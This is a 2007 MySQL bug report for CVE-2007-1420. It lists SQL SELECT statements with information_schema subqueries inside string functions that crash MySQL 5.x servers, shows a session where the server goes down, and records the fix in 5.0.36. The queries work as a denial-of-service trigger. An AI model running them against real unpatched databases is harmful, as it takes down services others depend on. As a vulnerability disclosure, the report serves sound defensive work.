Bug #26556 MYSQL 5.X DoS
Submitted: 22 Feb 2007 7:43 Modified: 15 Mar 2007 13:28
Reporter: Sveta Smirnova Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server Severity:S1 (Critical)
Version:5+ OS:
Assigned to: Sveta Smirnova CPU Architecture:Any

[22 Feb 2007 7:43] Sveta Smirnova
Description:
Set of select statements on the database cause server crash

How to repeat:
SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');
[22 Feb 2007 7:57] Valeriy Kravchuk
With 5.0.27 on Windows we have:

C:\Program Files\MySQL\MySQL Server 5.2\bin>mysql -uroot -P 3308  test
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 18
Server version: 5.0.27-community-nt MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show tables;
Empty set (0.00 sec)

mysql> select trim(leading from (select table_name from information_schema.colum
ns order by 1));
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> select trim(leading from (select c1 from t1 order by 1));
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql> exit
[22 Feb 2007 8:42] Sergei Golubchik
Fixed in 5.0.36 apparently by the fix for BUG#24630
[14 Mar 2007 23:39] Christian Hammers
Hello

As this issue was considered security relevant, Mitre apparently has assigned a CVE id to it. Please add "CVE-2007-1420" to the Changelog (in this case for 5.1.16 and 5.0.?) so that people (and us distribution maintainers) can easily check if their version is affected or not.
More info on the CVE tag can be found here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1420

bye,

-christian-
[15 Mar 2007 13:28] Paul Dubois
Elevated 5.0.36, 5.1.16 changelog entry to security fix,
added CVE number.